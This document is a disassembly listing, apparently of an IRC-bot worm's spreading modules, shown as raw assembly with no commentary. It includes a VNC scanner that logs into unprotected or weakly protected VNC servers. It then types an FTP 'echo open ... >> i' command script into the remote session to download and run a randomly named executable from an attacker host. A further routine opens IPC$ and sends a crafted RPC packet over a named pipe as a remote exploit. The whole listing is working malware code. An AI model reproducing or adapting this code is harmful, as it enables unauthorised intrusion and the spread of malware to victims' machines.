jl short loc_420CAA
loc_420CDE: ; CODE XREF: sub_420BEE+E9�j
push 5
push eax
lea eax, [ebp+var_6C]
push esi
push eax
call sub_422063
lea eax, [ebp+var_6C]
push 0Ch
push eax
push edi
call sub_42071B
add esp, 1Ch
test eax, eax
jz short loc_420CAA
lea eax, [ebp+var_5C]
push 4
push eax
push edi
call sub_4206E2
add esp, 0Ch
test eax, eax
jz short loc_420CAA
mov ecx, [ebp+var_5C]
mov eax, ecx
mov edx, ecx
and eax, 0FF0000h
shr edx, 10h
or eax, edx
mov edx, ecx
shl edx, 10h
and ecx, 0FF00h
or edx, ecx
shr eax, 8
shl edx, 8
or eax, edx
mov [ebp+var_5C], eax
sub eax, ebx
jz loc_421119
mov esi, dword_42F15C
dec eax
mov ebx, 0FFh
mov edi, 3E8h
jz short loc_420D6F
dec eax
jz loc_42104D
xor esi, esi
inc esi
loc_420D5F: ; CODE XREF: sub_420BEE+BE�j
push [ebp+var_4]
call dword_42F298 ; closesocket
mov eax, esi
jmp loc_42111B
; ---------------------------------------------------------------------------
loc_420D6F: ; CODE XREF: sub_420BEE+165�j
push 1
push offset word_44D6A0
push [ebp+var_4]
call sub_42071B
add esp, 0Ch
test eax, eax
jz loc_42104D
lea eax, [ebp+var_58]
push 18h
push eax
push [ebp+var_4]
call sub_4206E2
add esp, 0Ch
test eax, eax
jz loc_42104D
mov eax, [ebp+var_58]
xor ecx, ecx
mov cl, byte ptr [ebp+var_58+1]
shl eax, 8
xor cl, al
and cx, bx
xor ecx, eax
mov eax, [ebp+var_58+2]
mov word ptr [ebp+var_58], cx
xor ecx, ecx
mov cl, byte ptr [ebp+var_58+3]
shl eax, 8
xor cl, al
and cx, bx
xor ecx, eax
mov eax, [ebp+var_50]
mov word ptr [ebp+var_58+2], cx
xor ecx, ecx
mov cl, byte ptr [ebp+var_50+1]
shl eax, 8
xor cl, al
and cx, bx
xor ecx, eax
mov eax, [ebp+var_50+2]
mov word ptr [ebp+var_50], cx
xor ecx, ecx
mov cl, byte ptr [ebp+var_50+3]
shl eax, 8
xor cl, al
and cx, bx
xor ecx, eax
mov eax, [ebp+var_4C]
mov word ptr [ebp+var_50+2], cx
xor ecx, ecx
mov cl, byte ptr [ebp+var_4C+1]
shl eax, 8
xor cl, al
and cx, bx
xor ecx, eax
mov eax, [ebp+var_44]
mov word ptr [ebp+var_4C], cx
mov ecx, eax
mov edx, eax
and ecx, 0FF0000h
shr edx, 10h
or ecx, edx
mov edx, eax
shl edx, 10h
and eax, 0FF00h
or edx, eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_118C]
push [ebp+var_20]
shr ecx, 8
push [ebp+var_18]
shl edx, 8
push offset aVncD_DSNopass ; "VNC%d.%d: %s - (NoPass)"
or ecx, edx
push 1000h
push eax
mov [ebp+var_44], ecx
call sub_42219B
add esp, 18h
cmp [ebp+arg_D0], 0
jz short loc_420E7F
lea eax, [ebp+var_118C]
push eax
push offset aS_1 ; "%s"
push [ebp+arg_0]
push [ebp+arg_4]
call sub_4104F6
add esp, 10h
loc_420E7F: ; CODE XREF: sub_420BEE+275�j
push 1000h
lea eax, [ebp+var_118C]
push 0
push eax
call sub_4221F0
lea eax, [ebp+var_10]
push 1
push eax
push [ebp+var_4]
call sub_42075C
add esp, 18h
push edi
call esi ; dword_42F15C
lea eax, [ebp+var_14]
push 0
push eax
push [ebp+var_4]
call sub_42075C
add esp, 0Ch
push edi
call esi ; dword_42F15C
lea eax, [ebp+var_10]
push 2
push eax
push [ebp+var_4]
call sub_42075C
add esp, 0Ch
push edi
call esi ; dword_42F15C
call sub_4220FC
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 9
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_18C]
push edx
push offset loc_43903C
push offset aSDDDDD_exe ; "%s%d%d%d%d%d.exe"
push eax
call sub_422063
push 100h
push 0
push offset byte_6312C0
call sub_4221F0
lea eax, [ebp+arg_8]
push eax
call sub_414173
add esp, 30h
mov [ebp+var_8], offset dword_455388
test eax, eax
jnz short loc_420F4F
mov [ebp+var_8], offset dword_4552D0
loc_420F4F: ; CODE XREF: sub_420BEE+358�j
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_18C]
push eax
call sub_4010E7
push eax
call sub_4010E7
push eax
push dword_44D680
push [ebp+var_8]
push offset aCmdCEchoOpen_0 ; "cmd /c echo open %s %d >> i &echo user "...
push ebx
push offset byte_6312C0
call sub_42219B
and [ebp+var_8], 0
push offset byte_6312C0
call sub_422120
add esp, 28h
test eax, eax
jbe short loc_420FDA
loc_420F97: ; CODE XREF: sub_420BEE+3EA�j
mov eax, [ebp+var_8]
movsx eax, byte_6312C0[eax]
push eax
push offset dword_44915C
lea eax, [ebp+var_1C]
push 3
push eax
call sub_42219B
lea eax, [ebp+var_1C]
push 0
push eax
push [ebp+var_4]
call sub_42075C
add esp, 1Ch
push 0Fh
call esi ; dword_42F15C
inc [ebp+var_8]
push offset byte_6312C0
call sub_422120
cmp [ebp+var_8], eax
pop ecx
jb short loc_420F97
loc_420FDA: ; CODE XREF: sub_420BEE+3A7�j
push edi
call esi ; dword_42F15C
lea eax, [ebp+var_24]
push 0
push eax
push [ebp+var_4]
call sub_42075C
add esp, 0Ch
push 7530h
call esi ; dword_42F15C
lea eax, [ebp+var_C]
push 1
push eax
push [ebp+var_4]
call sub_42075C
add esp, 0Ch
push edi
call esi ; dword_42F15C
lea eax, [ebp+var_12]
push 0
push eax
push [ebp+var_4]
call sub_42075C
add esp, 0Ch
push edi
call esi ; dword_42F15C
lea eax, [ebp+var_C]
push 2
push eax
push [ebp+var_4]
call sub_42075C
add esp, 0Ch
push edi
call esi ; dword_42F15C
mov eax, [ebp+arg_C0]
mov dword_6312B8, 1
lea eax, [eax+eax*8]
lea eax, ds:432090h[eax*8]
inc dword ptr [eax]
loc_42104D: ; CODE XREF: sub_420BEE+168�j
; sub_420BEE+195�j ...
lea eax, [ebp+var_8C]
push 10h
push eax
push [ebp+var_4]
call sub_4206E2
add esp, 0Ch
test eax, eax
jnz short loc_42106E
push [ebp+var_4]
call dword_42F298 ; closesocket
loc_42106E: ; CODE XREF: sub_420BEE+475�j
push [ebp+arg_D8]
call sub_422120
cmp eax, 8
pop ecx
jbe short loc_421089
mov eax, [ebp+arg_D8]
and byte ptr [eax+8], 0
loc_421089: ; CODE XREF: sub_420BEE+48F�j
push [ebp+arg_D8]
lea eax, [ebp+var_8C]
push eax
call sub_420688
lea eax, [ebp+var_8C]
push 10h
push eax
push [ebp+var_4]
call sub_42071B
add esp, 14h
test eax, eax
jnz short loc_4210BC
push [ebp+var_4]
call dword_42F298 ; closesocket
loc_4210BC: ; CODE XREF: sub_420BEE+4C3�j
lea eax, [ebp+var_28]
push 4
push eax
push [ebp+var_4]
call sub_4206E2
add esp, 0Ch
test eax, eax
jnz short loc_4210DA
push [ebp+var_4]
call dword_42F298 ; closesocket
loc_4210DA: ; CODE XREF: sub_420BEE+4E1�j
mov ecx, [ebp+var_28]
mov eax, ecx
mov edx, ecx
and eax, 0FF0000h
shr edx, 10h
or eax, edx
mov edx, ecx
shl edx, 10h
and ecx, 0FF00h
or edx, ecx
shr eax, 8
shl edx, 8
or eax, edx
mov [ebp+var_28], eax
sub eax, 0
jz short loc_421120
dec eax
jz short loc_421119
dec eax
jnz loc_420CAA
push 3E80h
call esi ; dword_42F15C
loc_421119: ; CODE XREF: sub_420BEE+5B�j
; sub_420BEE+A3�j ...
xor eax, eax
loc_42111B: ; CODE XREF: sub_420BEE+17C�j
; sub_420BEE+822�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_421120: ; CODE XREF: sub_420BEE+518�j
push 1
push offset word_44D6A0
push [ebp+var_4]
call sub_42071B
add esp, 0Ch
test eax, eax
jz loc_42140D
lea eax, [ebp+var_40]
push 18h
push eax
push [ebp+var_4]
call sub_4206E2
add esp, 0Ch
test eax, eax
jz loc_42140D
mov eax, [ebp+var_40]
xor ecx, ecx
mov cl, byte ptr [ebp+var_40+1]
push [ebp+arg_D8]
shl eax, 8
xor cl, al
and cx, bx
xor ecx, eax
mov eax, [ebp+var_40+2]
mov word ptr [ebp+var_40], cx
xor ecx, ecx
mov cl, byte ptr [ebp+var_40+3]
shl eax, 8
xor cl, al
and cx, bx
xor ecx, eax
mov eax, [ebp+var_38]
mov word ptr [ebp+var_40+2], cx
xor ecx, ecx
mov cl, byte ptr [ebp+var_38+1]
shl eax, 8
xor cl, al
and cx, bx
xor ecx, eax
mov eax, [ebp+var_38+2]
mov word ptr [ebp+var_38], cx
xor ecx, ecx
mov cl, byte ptr [ebp+var_38+3]
shl eax, 8
xor cl, al
and cx, bx
xor ecx, eax
mov eax, [ebp+var_34]
mov word ptr [ebp+var_38+2], cx
xor ecx, ecx
mov cl, byte ptr [ebp+var_34+1]
shl eax, 8
xor cl, al
and cx, bx
xor ecx, eax
mov eax, [ebp+var_2C]
mov word ptr [ebp+var_34], cx
mov ecx, eax
mov edx, eax
and ecx, 0FF0000h
shr edx, 10h
or ecx, edx
mov edx, eax
shl edx, 10h
and eax, 0FF00h
or edx, eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_118C]
push [ebp+var_20]
shr ecx, 8
push [ebp+var_18]
shl edx, 8
push offset aVncD_DSS ; "VNC%d.%d: %s - %s"
or ecx, edx
push 1000h
push eax
mov [ebp+var_2C], ecx
call sub_42219B
add esp, 1Ch
cmp [ebp+arg_D0], 0
jz short loc_421236
lea eax, [ebp+var_118C]
push eax
push offset aS_1 ; "%s"
push [ebp+arg_0]
push [ebp+arg_4]
call sub_4104F6
add esp, 10h
loc_421236: ; CODE XREF: sub_420BEE+62C�j
push 1000h
lea eax, [ebp+var_118C]
push 0
push eax
call sub_4221F0
lea eax, [ebp+var_10]
push 1
push eax
push [ebp+var_4]
call sub_42075C
add esp, 18h
push edi
call esi ; dword_42F15C
lea eax, [ebp+var_14]
push 0
push eax
push [ebp+var_4]
call sub_42075C
add esp, 0Ch
push edi
call esi ; dword_42F15C
lea eax, [ebp+var_10]
push 2
push eax
push [ebp+var_4]
call sub_42075C
add esp, 0Ch
push edi
call esi ; dword_42F15C
call sub_4220FC
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 9
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_18C]
push edx
push offset loc_43903C
push offset aSDDDDD_exe ; "%s%d%d%d%d%d.exe"
push eax
call sub_422063
push 100h
push 0
push offset byte_6312C0
call sub_4221F0
lea eax, [ebp+arg_8]
push eax
call sub_414173
add esp, 30h
mov [ebp+arg_D8], offset dword_455388
test eax, eax
jnz short loc_42130C
mov [ebp+arg_D8], offset dword_4552D0
loc_42130C: ; CODE XREF: sub_420BEE+712�j
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_18C]
push eax
call sub_4010E7
push eax
call sub_4010E7
push eax
push dword_44D680
push [ebp+arg_D8]
push offset aCmdCEchoOpen_0 ; "cmd /c echo open %s %d >> i &echo user "...
push ebx
mov ebx, offset byte_6312C0
push ebx
call sub_42219B
and [ebp+arg_D8], 0
push ebx
call sub_422120
add esp, 28h
test eax, eax
jbe short loc_42139F
loc_421357: ; CODE XREF: sub_420BEE+7AF�j
mov eax, [ebp+arg_D8]
movsx eax, byte_6312C0[eax]
push eax
push offset dword_44915C
lea eax, [ebp+var_1C]
push 3
push eax
call sub_42219B
lea eax, [ebp+var_1C]
push 0
push eax
push [ebp+var_4]
call sub_42075C
add esp, 1Ch
push 0Fh
call esi ; dword_42F15C
inc [ebp+arg_D8]
push ebx
call sub_422120
cmp [ebp+arg_D8], eax
pop ecx
jb short loc_421357
loc_42139F: ; CODE XREF: sub_420BEE+767�j
push edi
call esi ; dword_42F15C
mov ebx, [ebp+var_4]
lea eax, [ebp+var_24]
push 0
push eax
push ebx
call sub_42075C
add esp, 0Ch
push 7530h
call esi ; dword_42F15C
lea eax, [ebp+var_C]
push 1
push eax
push ebx
call sub_42075C
add esp, 0Ch
push edi
call esi ; dword_42F15C
lea eax, [ebp+var_12]
push 0
push eax
push ebx
call sub_42075C
add esp, 0Ch
push edi
call esi ; dword_42F15C
lea eax, [ebp+var_C]
push 2
push eax
push ebx
call sub_42075C
add esp, 0Ch
push edi
call esi ; dword_42F15C
mov eax, [ebp+arg_C0]
mov dword_6312B8, 1
lea eax, [eax+eax*8]
lea eax, ds:432090h[eax*8]
inc dword ptr [eax]
loc_42140D: ; CODE XREF: sub_420BEE+546�j
; sub_420BEE+55F�j
xor eax, eax
inc eax
jmp loc_42111B
sub_420BEE endp
; ---------------------------------------------------------------------------
cmp off_4490E8, 0
push ebx
push esi
push edi
jz short loc_421472
mov ebx, offset off_4490E8
loc_421426: ; CODE XREF: .text:00421470�j
cmp dword_6312B8, 0
jnz short loc_421472
push dword ptr [ebx]
lea esi, [esp+1Ch]
sub esp, 0D0h
push 34h
pop ecx
mov edi, esp
push dword ptr [esp+0E8h]
rep movsd
push dword ptr [esp+0E8h]
call sub_420BEE
add esp, 0DCh
test eax, eax
jnz short loc_42146A
push 3E80h
call dword_42F15C ; Sleep
loc_42146A: ; CODE XREF: .text:0042145D�j
add ebx, 4
cmp dword ptr [ebx], 0
jnz short loc_421426
loc_421472: ; CODE XREF: .text:0042141F�j
; .text:0042142D�j
xor eax, eax
pop edi
pop esi
inc eax
pop ebx
retn
; =============== S U B R O U T I N E =======================================
sub_421479 proc near ; CODE XREF: sub_421589+E5�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
xor edx, edx
cmp [esp+arg_4], edx
jbe short locret_4214A9
push esi
mov esi, [esp+4+arg_8]
loc_421486: ; CODE XREF: sub_421479+2D�j
mov eax, [esp+4+arg_0]
mov cl, [edx+eax]
mov al, cl
and cl, 0Fh
shr al, 4
add cl, 41h
add al, 41h
mov [esi+edx*2], cl
mov [esi+edx*2+1], al
inc edx
cmp edx, [esp+4+arg_4]
jb short loc_421486
pop esi
locret_4214A9: ; CODE XREF: sub_421479+6�j
retn
sub_421479 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4214AA proc near ; CODE XREF: sub_4214AA+CD�p
; sub_421589+48A�p
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_7 = byte ptr 0Fh
arg_C = word ptr 14h
arg_14 = dword ptr 1Ch
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_28], 0
push ebx
push esi
push edi
jz short loc_4214BE
or [ebp+arg_7], 1
jmp short loc_4214C2
; ---------------------------------------------------------------------------
loc_4214BE: ; CODE XREF: sub_4214AA+C�j
and [ebp+arg_7], 0FEh
loc_4214C2: ; CODE XREF: sub_4214AA+12�j
mov ebx, [ebp+arg_20]
mov eax, [ebp+arg_24]
lea ecx, [ebx+18h]
cmp ecx, eax
ja short loc_4214E3
or [ebp+arg_7], 2
and byte ptr [ebp+arg_28+3], 0
lea eax, [ebx+18h]
mov [ebp+arg_14], ebx
mov [ebp+arg_C], ax
jmp short loc_4214F5
; ---------------------------------------------------------------------------
loc_4214E3: ; CODE XREF: sub_4214AA+23�j
mov [ebp+arg_C], ax
add eax, 0FFFFFFE8h
and [ebp+arg_7], 0FDh
mov [ebp+arg_14], eax
mov byte ptr [ebp+arg_28+3], 1
loc_4214F5: ; CODE XREF: sub_4214AA+37�j
movzx eax, [ebp+arg_C]
push eax
mov [ebp+var_4], eax
call sub_422F79
test eax, eax
pop ecx
mov [ebp+arg_20], eax
jnz short loc_42150E
loc_42150A: ; CODE XREF: sub_4214AA+A4�j
xor eax, eax
jmp short loc_421584
; ---------------------------------------------------------------------------
loc_42150E: ; CODE XREF: sub_4214AA+5E�j
push 6
lea esi, [ebp+arg_4]
pop ecx
mov edi, eax
rep movsd
mov edi, [ebp+arg_14]
mov esi, [ebp+arg_1C]
push edi
add eax, 18h
push esi
push eax
call sub_4223F0
add esp, 0Ch
lea eax, [ebp+var_8]
push 0
push eax
push [ebp+var_4]
push [ebp+arg_20]
push [ebp+arg_0]
call dword_42F07C ; WriteFile
push [ebp+arg_20]
test eax, eax
jnz short loc_421550
call sub_4230B3
pop ecx
jmp short loc_42150A
; ---------------------------------------------------------------------------
loc_421550: ; CODE XREF: sub_4214AA+9C�j
call sub_4230B3
cmp byte ptr [ebp+arg_28+3], 0
pop ecx
jz short loc_421581
push 0
sub ebx, edi
push [ebp+arg_24]
add edi, esi
lea esi, [ebp+arg_4]
push ebx
push edi
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+arg_0]
rep movsd
call sub_4214AA
add esp, 2Ch
jmp short loc_421584
; ---------------------------------------------------------------------------
loc_421581: ; CODE XREF: sub_4214AA+B0�j
xor eax, eax
inc eax
loc_421584: ; CODE XREF: sub_4214AA+62�j
; sub_4214AA+D5�j
pop edi
pop esi
pop ebx
leave
retn
sub_4214AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421589 proc near ; CODE XREF: .text:00421B0B�p
; .text:00421B2F�p ...
var_CC48 = byte ptr -0CC48h
var_8C48 = byte ptr -8C48h
var_6C48 = byte ptr -6C48h
var_4C48 = byte ptr -4C48h
var_2C48 = word ptr -2C48h
var_10F0 = dword ptr -10F0h
var_7F4 = byte ptr -7F4h
var_7EF = byte ptr -7EFh
var_7B0 = byte ptr -7B0h
var_344 = byte ptr -344h
var_90 = byte ptr -90h
var_7C = dword ptr -7Ch
var_70 = byte ptr -70h
var_6C = byte ptr -6Ch
var_6B = byte ptr -6Bh
var_6A = byte ptr -6Ah
var_69 = byte ptr -69h
var_68 = dword ptr -68h
var_64 = word ptr -64h
var_62 = word ptr -62h
var_60 = dword ptr -60h
var_5C = word ptr -5Ch
var_5A = word ptr -5Ah
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = word ptr -50h
var_4E = byte ptr -4Eh
var_4C = byte ptr -4Ch
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_21 = byte ptr -21h
var_20 = dword ptr -20h
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
arg_CC = dword ptr 0D4h
arg_D4 = dword ptr 0DCh
arg_D8 = dword ptr 0E0h
push ebp
mov ebp, esp
mov eax, 0CC48h
call sub_4220C0
push ebx
push esi
push edi
lea eax, [ebp+arg_4]
push 5
push eax
call sub_401AB3
pop ecx
cmp eax, 3
pop ecx
mov [ebp+var_4], eax
jz short loc_4215BE
lea eax, [ebp+arg_4]
push 1
push eax
call sub_401AB3
pop ecx
mov [ebp+var_4], eax
pop ecx
loc_4215BE: ; CODE XREF: sub_421589+23�j
mov eax, dword_449344
xor ebx, ebx
cmp eax, ebx
mov [ebp+var_C], eax
jz loc_421A3C
push 2B1h
lea eax, [ebp+var_344]
push ebx
push eax
call sub_4221F0
mov esi, 0DACh
lea eax, [ebp+var_10F0]
push esi
push ebx
push eax
call sub_4221F0
push 1B58h
lea eax, [ebp+var_2C48]
push ebx
push eax
call sub_4221F0
push 0DABh
lea eax, [ebp+var_10F0]
push 41h
push eax
call sub_4221F0
mov edi, [ebp+arg_0]
push 5
push offset aFb ; "f\a"
lea edi, [edi+edi*2]
shl edi, 2
mov eax, dword ptr (loc_44930A+2)[edi]
mov ecx, dword ptr (loc_449307+1)[edi]
mov [ebp+eax+var_10F0], ecx
lea eax, [ebp+var_7F4]
push eax
call sub_4223F0
push 3Fh
lea eax, [ebp+var_7EF]
push offset sub_4492C8
push eax
call sub_4223F0
add esp, 48h
lea eax, [ebp+var_344]
push eax
push [ebp+var_C]
push offset dword_432980
call sub_421479
lea eax, [ebp+var_344]
push eax
call sub_422120
push eax
lea eax, [ebp+var_344]
push eax
lea eax, [ebp+var_7B0]
push eax
call sub_4223F0
lea eax, [ebp+var_344]
push eax
call sub_422120
add esp, 20h
cmp [ebp+var_4], 3
mov [ebp+eax+var_7B0], bl
jnz short loc_4216C7
xor eax, eax
loc_4216B1: ; CODE XREF: sub_421589+13C�j
movzx cx, byte ptr [ebp+eax+var_10F0]
mov [ebp+eax*2+var_2C48], cx
inc eax
cmp eax, esi
jb short loc_4216B1
loc_4216C7: ; CODE XREF: sub_421589+124�j
lea eax, [ebp+arg_4]
mov esi, 2000h
push eax
push offset aS_8 ; "\\\\%s"
lea eax, [ebp+var_6C48]
push esi
push eax
call sub_42219B
lea eax, [ebp+var_6C48]
push esi
push eax
lea eax, [ebp+var_CC48]
push eax
call sub_424D66
lea eax, [ebp+arg_4]
push offset a__0 ; "."
push eax
call sub_424380
add esp, 24h
test eax, eax
jz short loc_421763
lea eax, [ebp+arg_4]
push eax
push offset dword_449368
lea eax, [ebp+var_8C48]
push esi
push eax
call sub_42219B
push esi
lea eax, [ebp+var_8C48]
push offset aIpc ; "IPC$"
push eax
call sub_421F40
push 20h
lea eax, [ebp+var_90]
push ebx
push eax
call sub_4221F0
lea eax, [ebp+var_8C48]
add esp, 28h
mov [ebp+var_7C], eax
mov eax, offset byte_44D6A4
push ebx
push eax
push eax
lea eax, [ebp+var_90]
push eax
call dword_4543BC
loc_421763: ; CODE XREF: sub_421589+180�j
lea eax, [ebp+arg_4]
push eax
push offset dword_449368
lea eax, [ebp+var_4C48]
push esi
push eax
call sub_42219B
push esi
lea eax, [ebp+var_4C48]
push offset dword_44935C
push eax
call sub_421F40
add esp, 1Ch
lea eax, [ebp+var_4C48]
push ebx
push ebx
push 3
push ebx
push 3
push 40000000h
push eax
call dword_42F060 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_421A31
push 48h
lea eax, [ebp+var_6C]
push ebx
push eax
call sub_4221F0
xor eax, eax
push 10h
inc eax
pop esi
mov [ebp+var_60], eax
mov [ebp+var_54], eax
mov [ebp+var_4E], al
mov [ebp+var_3C], eax
push esi
lea eax, [ebp+var_4C]
push offset dword_449348
push eax
mov [ebp+var_6C], 5
mov [ebp+var_6B], bl
mov [ebp+var_6A], 0Bh
mov [ebp+var_69], 3
mov [ebp+var_68], esi
mov [ebp+var_64], 48h
mov [ebp+var_62], bx
mov [ebp+var_5C], 10B8h
mov [ebp+var_5A], 10B8h
mov [ebp+var_58], ebx
mov [ebp+var_50], bx
call sub_4223F0
push esi
lea eax, [ebp+var_38]
push offset dword_43C844
push eax
mov [ebp+var_28], 2
call sub_4223F0
add esp, 24h
lea eax, [ebp+var_70]
push ebx
push eax
lea eax, [ebp+var_6C]
push 48h
push eax
push [ebp+var_4]
call dword_42F07C ; WriteFile
test eax, eax
jnz short loc_42184E
loc_421840: ; CODE XREF: sub_421589+330�j
push [ebp+var_4]
call dword_42F038 ; CloseHandle
jmp loc_421A31
; ---------------------------------------------------------------------------
loc_42184E: ; CODE XREF: sub_421589+2B5�j
lea eax, [ebp+var_CC48]
push eax
call sub_424B08
lea eax, [eax+eax+12h]
pop ecx
test al, 3
mov [ebp+arg_0], eax
jz short loc_42186F
loc_421866: ; CODE XREF: sub_421589+2E4�j
inc [ebp+arg_0]
test byte ptr [ebp+arg_0], 3
jnz short loc_421866
loc_42186F: ; CODE XREF: sub_421589+2DB�j
cmp byte ptr (loc_44930F+1)[edi], bl
jz short loc_42187B
add [ebp+arg_0], 4
loc_42187B: ; CODE XREF: sub_421589+2EC�j
lea eax, [ebp+var_2C48]
push eax
call sub_424B08
pop ecx
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax*2+0Eh]
jmp short loc_421892
; ---------------------------------------------------------------------------
loc_421891: ; CODE XREF: sub_421589+30B�j
inc eax
loc_421892: ; CODE XREF: sub_421589+306�j
test al, 3
jnz short loc_421891
add eax, 8
cmp byte ptr (loc_44930F+1)[edi], bl
jz short loc_4218A6
add eax, 4
jmp short loc_4218A8
; ---------------------------------------------------------------------------
loc_4218A6: ; CODE XREF: sub_421589+316�j
inc eax
inc eax
loc_4218A8: ; CODE XREF: sub_421589+31B�j
push eax
mov [ebp+arg_0], eax
call sub_422F79
mov esi, eax
pop ecx
cmp esi, ebx
mov [ebp+var_C], esi
jz short loc_421840
push [ebp+arg_0]
push ebx
push esi
call sub_4221F0
push 4
push offset dword_4492B8
push esi
call sub_4223F0
lea eax, [ebp+var_CC48]
push eax
call sub_424B08
inc eax
mov [esi+8], ebx
mov [esi+0Ch], eax
mov [esi+4], eax
lea eax, [ebp+var_CC48]
push eax
lea eax, [esi+10h]
push eax
call sub_424D41
lea eax, [ebp+var_CC48]
push eax
call sub_424B08
lea eax, [eax+eax+12h]
add esp, 28h
test al, 3
mov [ebp+var_8], eax
jz short loc_42191A
loc_421912: ; CODE XREF: sub_421589+38C�j
inc eax
test al, 3
jnz short loc_421912
mov [ebp+var_8], eax
loc_42191A: ; CODE XREF: sub_421589+387�j
cmp byte ptr (loc_44930F+1)[edi], bl
jz short loc_421938
push 4
add eax, esi
push offset dword_4492C0
push eax
call sub_4223F0
add esp, 0Ch
add [ebp+var_8], 4
loc_421938: ; CODE XREF: sub_421589+397�j
lea eax, [ebp+var_2C48]
push eax
call sub_424B08
mov ecx, [ebp+var_8]
inc eax
mov [ecx+esi+8], eax
mov [ecx+esi+4], ebx
mov [ecx+esi], eax
add ecx, 0Ch
mov [ebp+var_8], ecx
lea eax, [ebp+var_2C48]
add ecx, esi
push eax
push ecx
call sub_424D41
lea eax, [ebp+var_2C48]
push eax
call sub_424B08
mov ecx, [ebp+var_8]
add esp, 10h
lea eax, [ecx+eax*2+2]
test al, 3
mov [ebp+var_8], eax
jz short loc_42198D
loc_421985: ; CODE XREF: sub_421589+3FF�j
inc eax
test al, 3
jnz short loc_421985
mov [ebp+var_8], eax
loc_42198D: ; CODE XREF: sub_421589+3FA�j
push 8
add eax, esi
push ebx
push eax
call sub_4221F0
mov eax, [ebp+var_8]
add esp, 0Ch
add eax, 8
cmp byte ptr (loc_44930F+1)[edi], bl
jz short loc_4219AE
mov [eax+esi], ebx
jmp short loc_4219B4
; ---------------------------------------------------------------------------
loc_4219AE: ; CODE XREF: sub_421589+41E�j
mov word ptr [eax+esi], 1
loc_4219B4: ; CODE XREF: sub_421589+423�j
push 18h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_4221F0
xor eax, eax
add esp, 0Ch
inc eax
xor ecx, ecx
cmp byte ptr (loc_44930F+1)[edi], bl
push eax
push 10B8h
mov [ebp+var_24], 5
push [ebp+arg_0]
mov [ebp+var_23], bl
setnz cl
push esi
lea esi, [ebp+var_24]
sub esp, 18h
lea ecx, [ecx+ecx+19h]
mov [ebp+var_E], cx
mov [ebp+var_22], bl
push 6
mov [ebp+var_21], 3
pop ecx
mov [ebp+var_20], 10h
mov edi, esp
push [ebp+var_4]
mov [ebp+var_1A], bx
mov [ebp+var_18], eax
mov [ebp+var_10], bx
rep movsd
call sub_4214AA
add esp, 2Ch
test eax, eax
push [ebp+var_4]
jnz short loc_421A43
call dword_42F038 ; CloseHandle
push [ebp+var_C]
call sub_4230B3
pop ecx
loc_421A31: ; CODE XREF: sub_421589+224�j
; sub_421589+2C0�j
push ebx
push ebx
push [ebp+var_7C]
call dword_454374
loc_421A3C: ; CODE XREF: sub_421589+41�j
xor eax, eax
jmp loc_421ADA
; ---------------------------------------------------------------------------
loc_421A43: ; CODE XREF: sub_421589+497�j
call dword_42F038 ; CloseHandle
push [ebp+var_C]
call sub_4230B3
pop ecx
push ebx
push ebx
push [ebp+var_7C]
call dword_454374
push 76Ch
call dword_42F15C ; Sleep
movzx eax, word_439014
push eax
lea esi, [ebp+arg_4]
sub esp, 0D0h
push 34h
pop ecx
mov edi, esp
rep movsd
call sub_401160
add esp, 0D4h
test eax, eax
jz short loc_421AD7
mov eax, [ebp+arg_BC]
lea eax, [eax+eax*8]
shl eax, 3
lea ecx, dword_432090[eax]
inc dword ptr [ecx]
cmp [ebp+arg_CC], ebx
mov ecx, [ecx]
jz short loc_421AD7
push ecx
lea ecx, [ebp+arg_4]
lea eax, dword_432069[eax]
push ecx
push eax
push offset aRaMr15qabm1 ; "RA/Mr15qAbm1"
push offset aSSSExD ; "%s %s -> %s (Ex: %d)"
push [ebp+arg_D4]
push [ebp+arg_D8]
call sub_4104F6
add esp, 1Ch
loc_421AD7: ; CODE XREF: sub_421589+504�j
; sub_421589+522�j
xor eax, eax
inc eax
loc_421ADA: ; CODE XREF: sub_421589+4B5�j
pop edi
pop esi
pop ebx
leave
retn
sub_421589 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
lea eax, [ebp+10h]
push 1
push eax
call sub_401AB3
mov ebx, [ebp+0Ch]
pop ecx
pop ecx
lea esi, [ebp+10h]
push ebx
push dword ptr [ebp+8]
sub esp, 0D0h
push 34h
pop ecx
mov edi, esp
push 1
rep movsd
call sub_421589
add esp, 0DCh
lea esi, [ebp+10h]
mov [ebp+0Ch], eax
push ebx
